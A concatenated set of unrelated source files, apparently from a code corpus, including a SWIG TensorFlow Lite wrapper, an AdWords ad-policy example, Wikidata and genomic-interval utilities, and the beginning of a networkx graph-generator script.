name = "org_ow2_asm_asm",
artifact = "org.ow2.asm:asm:6.2.1",
artifact_sha256 = "1460db6c33cc99c84e5cb30e46b017e4d1cc9a7fbc174101d6f84829bb64c085",
srcjar_sha256 = "e9d6ffabe190d726536d3d47ad7e80ca3d0a19a19b59a3b2b4701a339d5d9196",
)
|
py | b40349a47a7d5f8a2d5f0a44f5adbec2de087705 | import re
import sys
MODULE_REGEX = r'^[_a-zA-Z][_a-zA-Z0-9]+$'
module_name = '{{ cookiecutter.project_slug }}'
if not re.match(MODULE_REGEX, module_name):
print(
(
'ERROR: The project slug ({}) is not a valid Python module name. '
'Please do not use a - and use _ instead'
).format(module_name)
)
sys.exit(1)
|
py | b40349a926ddfb46e57307a278414ea2585c0de4 | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.8
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_tensorflow_wrap_interpreter_wrapper', [dirname(__file__)])
except ImportError:
import _tensorflow_wrap_interpreter_wrapper
return _tensorflow_wrap_interpreter_wrapper
if fp is not None:
try:
_mod = imp.load_module('_tensorflow_wrap_interpreter_wrapper', fp, pathname, description)
finally:
fp.close()
return _mod
_tensorflow_wrap_interpreter_wrapper = swig_import_helper()
del swig_import_helper
else:
import _tensorflow_wrap_interpreter_wrapper
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr_nondynamic(self, class_type, name, static=1):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
if (not static):
return object.__getattr__(self, name)
else:
raise AttributeError(name)
def _swig_getattr(self, class_type, name):
return _swig_getattr_nondynamic(self, class_type, name, 0)
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object:
pass
_newclass = 0
class InterpreterWrapper(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, InterpreterWrapper, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, InterpreterWrapper, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
__swig_destroy__ = _tensorflow_wrap_interpreter_wrapper.delete_InterpreterWrapper
__del__ = lambda self: None
def AllocateTensors(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_AllocateTensors(self)
def Invoke(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_Invoke(self)
def InputIndices(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_InputIndices(self)
def OutputIndices(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_OutputIndices(self)
def ResizeInputTensor(self, i, value):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_ResizeInputTensor(self, i, value)
def NumTensors(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_NumTensors(self)
def TensorName(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_TensorName(self, i)
def TensorType(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_TensorType(self, i)
def TensorSize(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_TensorSize(self, i)
def TensorQuantization(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_TensorQuantization(self, i)
def SetTensor(self, i, value):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_SetTensor(self, i, value)
def GetTensor(self, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_GetTensor(self, i)
def ResetVariableTensors(self):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_ResetVariableTensors(self)
def tensor(self, base_object, i):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_tensor(self, base_object, i)
def ModifyGraphWithDelegate(self, delegate):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_ModifyGraphWithDelegate(self, delegate)
__swig_getmethods__["CreateWrapperCPPFromFile"] = lambda x: _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromFile
if _newclass:
CreateWrapperCPPFromFile = staticmethod(_tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromFile)
__swig_getmethods__["CreateWrapperCPPFromBuffer"] = lambda x: _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromBuffer
if _newclass:
CreateWrapperCPPFromBuffer = staticmethod(_tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromBuffer)
InterpreterWrapper_swigregister = _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_swigregister
InterpreterWrapper_swigregister(InterpreterWrapper)
def InterpreterWrapper_CreateWrapperCPPFromFile(*args):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromFile(*args)
InterpreterWrapper_CreateWrapperCPPFromFile = _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromFile
def InterpreterWrapper_CreateWrapperCPPFromBuffer(*args):
return _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromBuffer(*args)
InterpreterWrapper_CreateWrapperCPPFromBuffer = _tensorflow_wrap_interpreter_wrapper.InterpreterWrapper_CreateWrapperCPPFromBuffer
# This file is compatible with both classic and new-style classes.
|
py | b4034b22dbdce1898aa072314fc167adf171dc6e | #!/usr/bin/python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example demonstrates how to handle policy violation errors.
To get ad groups, run get_ad_groups.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
import suds
from googleads import adwords
AD_GROUP_ID = 'INSERT_AD_GROUP_ID_HERE'
def main(client, ad_group_id):
ad_group_ad_service = client.GetService('AdGroupAdService', 'v201702')
# Create expanded text ad that violates an exemptable policy.
exemptable_expanded_text_ad_operation = {
'operator': 'ADD',
'operand': {
'adGroupId': ad_group_id,
'ad': {
# The 'xsi_type' field allows you to specify the xsi:type of the
# object being created. It's only necessary when you must provide
# an explicit type that the client library can't infer.
'xsi_type': 'ExpandedTextAd',
'headlinePart1': 'Mars Cruise!!!',
'headlinePart2': 'Best space cruise line.',
'description': 'Visit the Red Planet in style.',
'finalUrls': ['http://www.example.com']
}
}
}
# Create text ad that violates a non-exemptable policy.
non_exemptable_expanded_text_ad_operation = {
'operator': 'ADD',
'operand': {
'adGroupId': ad_group_id,
'ad': {
# The 'xsi_type' field allows you to specify the xsi:type of the
# object being created. It's only necessary when you must provide
# an explicit type that the client library can't infer.
'xsi_type': 'ExpandedTextAd',
'headlinePart1': 'Mars Cruise with too long of a headline.',
'headlinePart2': 'Best space cruise line.',
'description': 'Visit the Red Planet in style.',
'finalUrls': ['http://www.example.com']
}
}
}
operations = [exemptable_expanded_text_ad_operation,
non_exemptable_expanded_text_ad_operation]
# Validate the ad.
try:
# Enable "validate only" to check for errors.
client.validate_only = True
ad_group_ad_service.mutate(operations)
print 'Validation successful, no errors returned.'
except suds.WebFault, e:
for error in e.fault.detail.ApiExceptionFault.errors:
# Get the index of the failed operation from the error's field path
# elements.
field_path_elements = error['fieldPathElements']
first_field_path_element = None
if field_path_elements:
first_field_path_element = field_path_elements[0]
# If the operation index is not present on the first error field path
# element, then there's no way to determine which operation to remove,
# so simply throw the exception.
if (not (first_field_path_element
and first_field_path_element['field'] == 'operations'
and first_field_path_element['index'])):
raise e
operation_index = first_field_path_element['index']
index = int(operation_index[0])
operation = operations[index]
if not HandleAPIError(error, operation):
# Set non-exemptable operation to None to mark for deletion.
print ('Removing operation with non-exemptable error at index %s.'
% operation_index)
operations[index] = None
# Remove the non-exemptable operations.
operations = [op for op in operations if op is not None]
# Add these ads. Disable "validate only" so the ads will get created.
client.validate_only = False
if operations:
response = ad_group_ad_service.mutate(operations)
if response and response['value']:
ads = response['value']
print 'Added %s ad(s) to ad group %s.' % (len(ads), ad_group_id)
for ad in ads:
print (' Ad id is %s, type is %s and status is \'%s\'.' %
(ad['ad']['id'], ad['ad']['Ad.Type'], ad['status']))
else:
print 'No ads were added.'
def HandleAPIError(error, operation):
"""Makes an exemption for exemptable PolicyViolationErrors.
Args:
error: the error associated with the given operation.
operation: the operation associated with the given error.
Returns:
A boolean that is True if the given error was an exemptable
PolicyViolationError; otherwise, returns False.
"""
is_exemptable = False
# Determine if the operation can be resubmitted with an exemption request.
if error['ApiError.Type'] == 'PolicyViolationError':
expanded_text_ad = operation['operand']['ad']
is_exemptable = (error['isExemptable'] if 'isExemptable' in error else
False)
print ('Ad with headline "%s - %s" violated %s policy "%s".' %
(expanded_text_ad['headlinePart1'],
expanded_text_ad['headlinePart2'],
'exemptable' if is_exemptable else 'non-exemptable',
error['externalPolicyName']))
if is_exemptable:
# Add exemption request to the operation.
print ('Adding exemption request for policy name \'%s\' on text \'%s\'.'
% (error['key']['policyName'], error['key']['violatingText']))
if 'exemptionRequests' not in operation:
operation['exemptionRequests'] = []
operation['exemptionRequests'].append({'key': error['key']})
return is_exemptable
if __name__ == '__main__':
# Initialize client object.
adwords_client = adwords.AdWordsClient.LoadFromStorage()
main(adwords_client, AD_GROUP_ID)
|
py | b4034b4c4fa987a8e6ad0ebee3bf001bde3db0c8 | import numpy as np
# Calculate FPOs of NN
tanhflops = 15
reluflops = 2
sineflops = 15
def matmulf(n,m,k, isparallel):
if isparallel:
return 2*m-1
else:
return (2*m-1)*n*k
def vecaddf(n, isparallel):
if isparallel:
return 1
else:
return n
def actfunc(n, afunc, isparallel):
if isparallel:
return afunc
else:
return n*afunc
def layerf(n, m, afunc, isparallel):
# weight matrix: m times n
# (m, n)*(n, 1)
flops = 0
flops += matmulf(n, m, 1, isparallel)
flops += vecaddf(m, isparallel)
flops += actfunc(m, afunc, isparallel)
return flops
def ffdnnf(nnarc, afunc, isparallel):
flops = 0
prevlayer = nnarc[0]
for width in nnarc[1:]:
flops += layerf(prevlayer, width, afunc, isparallel)
prevlayer = width
return flops
def p2f(n, isparallel):
if isparallel:
return 5
else:
return 13*n
def paramf(n, nnarc, afunc, isparallel):
flops = 0
prevlayer = 2
for width in nnarc:
flops += layerf(prevlayer, n*width, afunc, isparallel)
prevlayer = n*width
flops += layerf(prevlayer, n, afunc, isparallel)
return flops
def nnf(NNarc, nnafunc, paramafunc, isparallel):
flops = 0
ffdlayers = []
for layer in NNarc:
ffdlayers.append(layer[0])
flops += ffdnnf(ffdlayers, nnafunc, isparallel)
paramflops = 0
prevwidth = 0
for layer in NNarc[1:]:
matrixn = prevwidth*layer[0]
biasn = layer[0]
type_ = layer[1]
if type_ == 'p2':
flps = p2f(matrixn + biasn, isparallel)
if isparallel and paramflops < flps:
paramflops = flps
elif not isparallel:
paramflops += flps
else:
flps = paramf(matrixn, type_, paramafunc, isparallel)
if isparallel and paramflops < flps:
paramflops = flps
elif not isparallel:
paramflops += flps
flps = 0
flps = paramf(biasn, type_, paramafunc, isparallel)
if isparallel and paramflops < flps:
paramflops = flps
elif not isparallel:
paramflops += flps
flps = 0
flops += paramflops
return flops
nnarc = [[1, 'input layer'],
[5, [2, 4, 4, 2]],
[10, [2, 4, 4, 2]],
[15, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[20, [2, 4, 4, 2]],
[15, [2, 4, 4, 2]],
[10, [2, 4, 4, 2]],
[5, [2, 4, 4, 2]],
[1, 'p2']]
print(nnf(nnarc, tanhflops, reluflops, True), nnf(nnarc, tanhflops, reluflops, False))
|
py | b4034c0d169d0dced0db7514248838538b856695 | import random
class Service():
# returns a random number
# NOTE: You do not need to modify this method!
# Mock it instead
def bad_random():
file = open('/Users/dchui1/datafile', 'r')
numberStrings = file.readlines()
numbers = [int(x) for x in numberStrings]
return random.randint(0, len(numberStrings)-1)
# Test this
def divide(self, y):
return self.bad_random() / y
# Test this
def abs_plus(self, x):
return abs(x) + 1
# Test this
def complicated_function(self, x):
return self.divide(x), self.bad_random() % 2
|
py | b4034cb1ae9782ce15c119a52ddf5b31aa28fccc | # coding: utf-8
from __future__ import unicode_literals
import gzip
import json
import logging
import datetime
logger = logging.getLogger(__name__)
def read_wikidata_entities_json(wikidata_file, limit=None, to_print=False, lang="en", parse_descriptions=True):
# Read the JSON wiki data and parse out the entities. Takes about 7u30 to parse 55M lines.
# get latest-all.json.bz2 from https://dumps.wikimedia.org/wikidatawiki/entities/
site_filter = '{}wiki'.format(lang)
# properties filter (currently disabled to get ALL data)
prop_filter = dict()
# prop_filter = {'P31': {'Q5', 'Q15632617'}} # currently defined as OR: one property suffices to be selected
title_to_id = dict()
id_to_descr = dict()
# parse appropriate fields - depending on what we need in the KB
parse_properties = False
parse_sitelinks = True
parse_labels = False
parse_aliases = False
parse_claims = False
with gzip.open(wikidata_file, mode='rb') as file:
for cnt, line in enumerate(file):
if limit and cnt >= limit:
break
if cnt % 500000 == 0:
logger.info("processed {} lines of WikiData dump".format(cnt))
clean_line = line.strip()
if clean_line.endswith(b","):
clean_line = clean_line[:-1]
if len(clean_line) > 1:
obj = json.loads(clean_line)
entry_type = obj["type"]
if entry_type == "item":
# filtering records on their properties (currently disabled to get ALL data)
# keep = False
keep = True
claims = obj["claims"]
if parse_claims:
for prop, value_set in prop_filter.items():
claim_property = claims.get(prop, None)
if claim_property:
for cp in claim_property:
cp_id = (
cp["mainsnak"]
.get("datavalue", {})
.get("value", {})
.get("id")
)
cp_rank = cp["rank"]
if cp_rank != "deprecated" and cp_id in value_set:
keep = True
if keep:
unique_id = obj["id"]
if to_print:
print("ID:", unique_id)
print("type:", entry_type)
# parsing all properties that refer to other entities
if parse_properties:
for prop, claim_property in claims.items():
cp_dicts = [
cp["mainsnak"]["datavalue"].get("value")
for cp in claim_property
if cp["mainsnak"].get("datavalue")
]
cp_values = [
cp_dict.get("id")
for cp_dict in cp_dicts
if isinstance(cp_dict, dict)
if cp_dict.get("id") is not None
]
if cp_values:
if to_print:
print("prop:", prop, cp_values)
found_link = False
if parse_sitelinks:
site_value = obj["sitelinks"].get(site_filter, None)
if site_value:
site = site_value["title"]
if to_print:
print(site_filter, ":", site)
title_to_id[site] = unique_id
found_link = True
if parse_labels:
labels = obj["labels"]
if labels:
lang_label = labels.get(lang, None)
if lang_label:
if to_print:
print(
"label (" + lang + "):", lang_label["value"]
)
if found_link and parse_descriptions:
descriptions = obj["descriptions"]
if descriptions:
lang_descr = descriptions.get(lang, None)
if lang_descr:
if to_print:
print(
"description (" + lang + "):",
lang_descr["value"],
)
id_to_descr[unique_id] = lang_descr["value"]
if parse_aliases:
aliases = obj["aliases"]
if aliases:
lang_aliases = aliases.get(lang, None)
if lang_aliases:
for item in lang_aliases:
if to_print:
print(
"alias (" + lang + "):", item["value"]
)
if to_print:
print()
return title_to_id, id_to_descr
def write_entity_files(entity_def_output, title_to_id):
with entity_def_output.open("w", encoding="utf8") as id_file:
id_file.write("WP_title" + "|" + "WD_id" + "\n")
for title, qid in title_to_id.items():
id_file.write(title + "|" + str(qid) + "\n")
def write_entity_description_files(entity_descr_output, id_to_descr):
with entity_descr_output.open("w", encoding="utf8") as descr_file:
descr_file.write("WD_id" + "|" + "description" + "\n")
for qid, descr in id_to_descr.items():
descr_file.write(str(qid) + "|" + descr + "\n")
|
py | b4034d19445033b7ea3b056304eba4c0c35a1fb2 | from tkinter import *
# This file shows how to trap the killing of a window
# when the user uses window manager menus (typ. upper left hand corner
# menu in the decoration border).
### ******* this isn't really called -- read the comments
def my_delete_callback():
print("whoops -- tried to delete me!")
class Test(Frame):
def deathHandler(self, event):
print(self, "is now getting nuked. performing some save here....")
def createWidgets(self):
# a hello button
self.hi_there = Button(self, text='Hello')
self.hi_there.pack(side=LEFT)
def __init__(self, master=None):
Frame.__init__(self, master)
Pack.config(self)
self.createWidgets()
###
### PREVENT WM kills from happening
###
# the docs would have you do this:
# self.master.protocol("WM_DELETE_WINDOW", my_delete_callback)
# unfortunately, some window managers will not send this request to a window.
# the "protocol" function seems incapable of trapping these "aggressive" window kills.
# this line of code catches everything, tho. The window is deleted, but you have a chance
# of cleaning up first.
self.bind_all("<Destroy>", self.deathHandler)
test = Test()
test.mainloop()
|
py | b4034d839090100ed19ff7e5814d748fc844159c | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import subprocess
import re
import os
import six
import numpy as np
import pandas as pd
from .region import parse_region
from ._process import tsv
def atoi(s):
return int(s.replace(',', ''))
def natsort_key(s, _NS_REGEX=re.compile(r'(\d+)', re.U)):
return tuple([int(x) if x.isdigit() else x for x in _NS_REGEX.split(s) if x])
def natsorted(iterable):
return sorted(iterable, key=natsort_key)
def argnatsort(array):
array = np.asarray(array)
if not len(array): return np.array([], dtype=int)
cols = tuple(zip(*(natsort_key(x) for x in array)))
return np.lexsort(cols[::-1]) # numpy's lexsort is ass-backwards
def _find_block_span(arr, val):
'''Find the first and the last occurence + 1 of the value in the array.
'''
# it can be done via bisection, but for now BRUTE FORCE
block_idxs = np.where(arr==val)[0]
lo, hi = block_idxs[0], block_idxs[-1]+1
return lo,hi
def bedbisect(bedf, region):
"""Returns the span of a block of rows corresponding to
the genomic region.
Rows must be sorted by `start` and `end`;
`chrom` must be grouped, but does not have to be sorted.
"""
chrom, start, end = parse_region(region)
lo, hi = _find_block_span(bedf.chrom.values, chrom)
lo += bedf['end'].values[lo:hi].searchsorted(start, side='right')
if end is not None:
hi = lo + bedf['start'].values[lo:hi].searchsorted(end, side='left')
# else:
# hi = None This only works when bedf is a groupby object.
return lo, hi
def bedslice(bedf, region):
"""Returns a block of rows corresponding to the genomic region.
Rows must be sorted by `start` and `end`;
`chrom` must be grouped, but does not have to be sorted.
"""
lo, hi = bedbisect(bedf, region)
return bedf.iloc[lo:hi]
def bedslice_series(beds, region):
"""
Slice a series multi-indexed by ['chrom', 'start', 'end'].
Assumes no proper nesting of intervals.
"""
chrom, start, end = region
return beds.loc[chrom].loc[start:end]
def bg2slice(bg2, region1, region2):
"""
Slice a dataframe with columns ['chrom1', 'start1', 'end1', 'chrom2',
'start2', 'end2']. Assumes no proper nesting of intervals.
"""
chrom1, start1, end1 = region1
chrom2, start2, end2 = region2
if end1 is None:
end1 = np.inf
if end2 is None:
end2 = np.inf
out = bg2[(bg2['chrom1'] == chrom1) &
(bg2['start1'] >= start1) &
(bg2['end1'] < end1) &
(bg2['chrom2'] == chrom2) &
(bg2['start2'] >= start2) &
(bg2['end2'] < end2)]
return out
def expand_regions(df, pad_bp, chromsizes, side='both', inplace=False):
if not inplace:
df = df.copy()
if side == 'both' or side == 'left':
df.start = np.maximum(0, df.start.values - pad_bp)
if side == 'both' or side == 'right':
df.end = np.minimum(df.chrom.apply(chromsizes.__getitem__),
df.end+pad_bp)
return df
def bychrom(func, *tables, **kwargs):
"""
Split one or more bed-like dataframes by chromosome.
Apply ``func(chrom, *slices)`` to each chromosome slice.
Yield results.
Parameters
----------
func : function to apply to split dataframes.
The expected signature is ``func(chrom, df1[, df2[, ...])``,
where ``df1, df2, ...`` are subsets of the input dataframes.
The function can return anything.
tables : sequence of BED-like ``pd.DataFrame``s.
The first column of each dataframe must be chromosome labels,
unless specified by ``chrom_field``.
chroms : sequence of str, optional
Select which chromosome subsets of the data to apply the function to.
Defaults to all unique chromosome labels in the first dataframe input,
in natural sorted order.
chrom_field: str, optional
Name of column containing chromosome labels.
ret_chrom : bool, optional (default: False)
Yield "chromosome, value" pairs as output instead of only values.
map : callable, optional (default: ``itertools.imap`` or ``map`` in Python 3)
Map implementation to use.
Returns
-------
Iterator or future that yields the output of running `func` on
each chromosome
"""
chroms = kwargs.pop('chroms', None)
parallel = kwargs.pop('parallel', False)
ret_chrom = kwargs.pop('ret_chrom', False)
map_impl = kwargs.pop('map', six.moves.map)
first = tables[0]
chrom_field = kwargs.pop('chrom_field', first.columns[0])
if chroms is None:
chroms = natsorted(first[chrom_field].unique())
grouped_tables = [table.groupby(chrom_field) for table in tables]
def iter_partials():
for chrom in chroms:
partials = []
for gby in grouped_tables:
try:
partials.append(gby.get_group(chrom))
except KeyError:
partials.append(gby.head()[0:0])
yield partials
if ret_chrom:
def run_job(chrom, partials):
return chrom, func(chrom, *partials)
else:
def run_job(chrom, partials):
return func(chrom, *partials)
return map_impl(run_job, chroms, iter_partials())
def chromsorted(df, by=None, ignore_index=True, chromosomes=None, **kwargs):
"""
Sort bed-like dataframe by chromosome label in "natural" alphanumeric
order, followed by any columns specified in ``by``.
"""
chrom_col = df['chrom']
is_categorical = pd.api.types.is_categorical(chrom_col)
if chromosomes is None:
if not (is_categorical and chrom_col.cat.ordered):
dtype = pd.CategoricalDtype(
natsorted(chrom_col.unique()), ordered=True
)
chrom_col = chrom_col.astype(dtype)
else:
dtype = pd.CategoricalDtype(chromosomes, ordered=True)
chrom_col = chrom_col.astype(dtype)
missing = df['chrom'].loc[chrom_col.isnull()].unique().tolist()
if len(missing):
raise ValueError("Unknown ordering for {}.".format(missing))
sort_cols = ['chrom']
if by is not None:
if not isinstance(by, list):
by = [by]
sort_cols.append(by)
out = (
df
.assign(chrom=chrom_col)
.sort_values(sort_cols, **kwargs)
.reset_index(drop=True)
)
if not is_categorical:
out['chrom'] = out['chrom'].astype(str)
return out
def make_chromarms(chromsizes, mids, binsize=None, suffixes=('p', 'q')):
"""
Split chromosomes into chromosome arms
Parameters
----------
chromsizes : pandas.Series
Series mapping chromosomes to lengths in bp.
mids : dict-like
Mapping of chromosomes to midpoint locations.
binsize : int, optional
Round midpoints to nearest bin edge for compatibility with a given
bin grid.
suffixes : tuple, optional
Suffixes to name chromosome arms. Defaults to p and q.
Returns
-------
4-column BED-like DataFrame (chrom, start, end, name).
Arm names are chromosome names + suffix.
Any chromosome not included in ``mids`` will be omitted.
"""
chromosomes = [chrom for chrom in chromsizes.index if chrom in mids]
p_arms = [
[chrom, 0, mids[chrom], chrom + suffixes[0]]
for chrom in chromosomes
]
if binsize is not None:
for x in p_arms:
x[2] = int(round(x[2] / binsize)) * binsize
q_arms = [
[chrom, mids[chrom], chromsizes[chrom], chrom + suffixes[1]]
for chrom in chromosomes
]
if binsize is not None:
for x in q_arms:
x[1] = int(round(x[1] / binsize)) * binsize
interleaved = [*sum(zip(p_arms, q_arms), ())]
return pd.DataFrame(
interleaved,
columns=['chrom', 'start', 'end', 'name']
)
def binnify(chromsizes, binsize, rel_ids=False):
"""
Divide a genome into evenly sized bins.
Parameters
----------
chromsizes : Series
pandas Series indexed by chromosome name with chromosome lengths in bp.
binsize : int
size of bins in bp
Returns
-------
Data frame with columns: 'chrom', 'start', 'end'.
"""
def _each(chrom):
clen = chromsizes[chrom]
n_bins = int(np.ceil(clen / binsize))
binedges = np.arange(0, (n_bins+1)) * binsize
binedges[-1] = clen
return pd.DataFrame({
'chrom': [chrom]*n_bins,
'start': binedges[:-1],
'end': binedges[1:],
}, columns=['chrom', 'start', 'end'])
bintable = pd.concat(map(_each, chromsizes.keys()),
axis=0, ignore_index=True)
if rel_ids:
bintable['rel_id'] = bintable.groupby('chrom').cumcount()
# if as_cat:
# bintable['chrom'] = pd.Categorical(
# bintable['chrom'],
# categories=list(chromsizes.keys()),
# ordered=True)
return bintable
def digest(fasta_records, enzyme):
"""
Divide a genome into restriction fragments.
Parameters
----------
fasta_records : OrderedDict
Dictionary of chromosome names to sequence records.
enzyme: str
Name of restriction enzyme.
Returns
-------
Dataframe with columns: 'chrom', 'start', 'end'.
"""
import Bio.Restriction as biorst
import Bio.Seq as bioseq
# http://biopython.org/DIST/docs/cookbook/Restriction.html#mozTocId447698
chroms = fasta_records.keys()
try:
cut_finder = getattr(biorst, enzyme).search
except AttributeError:
raise ValueError('Unknown enzyme name: {}'.format(enzyme))
def _each(chrom):
seq = bioseq.Seq(str(fasta_records[chrom]))
cuts = np.r_[0, np.array(cut_finder(seq)) + 1, len(seq)].astype(int)
n_frags = len(cuts) - 1
frags = pd.DataFrame({
'chrom': [chrom] * n_frags,
'start': cuts[:-1],
'end': cuts[1:]},
columns=['chrom', 'start', 'end'])
return frags
return pd.concat(map(_each, chroms), axis=0, ignore_index=True)
def frac_mapped(bintable, fasta_records):
def _each(bin):
s = str(fasta_records[bin.chrom][bin.start:bin.end])
nbases = len(s)
n = s.count('N')
n += s.count('n')
return (nbases - n) / nbases
return bintable.apply(_each, axis=1)
def frac_gc(bintable, fasta_records, mapped_only=True):
def _each(chrom_group):
chrom = chrom_group.name
seq = fasta_records[chrom]
gc = []
for _, bin in chrom_group.iterrows():
s = str(seq[bin.start:bin.end])
g = s.count('G')
g += s.count('g')
c = s.count('C')
c += s.count('c')
nbases = len(s)
if mapped_only:
n = s.count('N')
n += s.count('n')
nbases -= n
gc.append((g + c) / nbases if nbases > 0 else np.nan)
return gc
out = bintable.groupby('chrom', sort=False).apply(_each)
return pd.Series(data=np.concatenate(out), index=bintable.index)
def frac_gene_coverage(bintable, mrna):
from .tools import bedtools
if isinstance(mrna, six.string_types):
from .resources import UCSCClient
mrna=UCSCClient(mrna).fetch_mrna().rename(
columns={'tName': 'chrom', 'tStart': 'start', 'tEnd': 'end'})
mrna = mrna.sort_values(['chrom','start','end']).reset_index(drop=True)
with tsv(bintable) as a, tsv(mrna[['chrom','start','end']]) as b:
cov = bedtools.coverage(a=a.name, b=b.name)
bintable = bintable.copy()
bintable['gene_count'] = cov.iloc[:,-4]
bintable['gene_coverage'] = cov.iloc[:,-1]
return bintable
|
py | b4034e1d1238e32aea60ad40c58e5719062b4210 | from clients.racktivity.energyswitch.common import convert
from Jumpscale import j
JSBASE = j.baseclasses.object
class BaseModule(j.baseclasses.object):
def __init__(self, parent):
JSBASE.__init__(self)
self._parent = parent
self._guidTable = {}
self._pointerGuids = []
def definePointerStructure(self):
"""prepares definition of binary structure
@param guidList - list of tuples (guid, count)
@param guidDef - dictionary of guid -> definition
returns paramInfo structure - list of tuples (guid, definition, count)
"""
paramInfo = []
for (guid, length) in self._pointerGuids:
paramInfo.append((guid, self._guidTable[guid], length))
return paramInfo
def _getPointerData(self, moduleID):
"""private function to get pointer data from device and convert to dict
"""
paramInfo = self.definePointerStructure()
data = self._parent.client.getPointer(moduleID)
array = convert.pointer2values(data, paramInfo)
result = dict()
for idx, info in enumerate(paramInfo):
result[info[0]] = array[idx]
return result
|
py | b4034f39e400e62fd76a1306e19cf674eae9ca9d | #!/usr/bin/env python
"""
You must have networkx, matplotlib>=87.7 for this program to work.
"""
# Author: Rishi Thakkar ([email protected])
try:
import matplotlib.pyplot as plt
plot_lib=True
except:
plot_lib=False
import networkx as nx
import random
import sys
import os
import shutil
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
##### Get user inputs #####
print("Welcome to the Graph Generator!\n")
print(bcolors.HEADER + bcolors.BOLD + bcolors.UNDERLINE + "Graph Type to Use:" + bcolors.ENDC)
modeDescription = bcolors.WARNING + "Mode 0 - " + bcolors.ENDC + bcolors.OKGREEN + "Random Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 1 - " + bcolors.ENDC + bcolors.OKGREEN + "Complete Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 2 - " + bcolors.ENDC + bcolors.OKGREEN + "Barbell Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 3 - " + bcolors.ENDC + bcolors.OKGREEN + "2D Grid Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 4 - " + bcolors.ENDC + bcolors.OKGREEN + "Dorogovtsev Goltsev Mmendes Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 5 - " + bcolors.ENDC + bcolors.OKGREEN + "Cycle Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 6 - " + bcolors.ENDC + bcolors.OKGREEN + "Circular Ladder Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 7 - " + bcolors.ENDC + bcolors.OKGREEN + "Lollipop Graph" + bcolors.ENDC + "\n"
modeDescription += bcolors.WARNING + "Mode 8 - " + bcolors.ENDC + bcolors.OKGREEN + "Wheel Graph" + bcolors.ENDC + "\n"
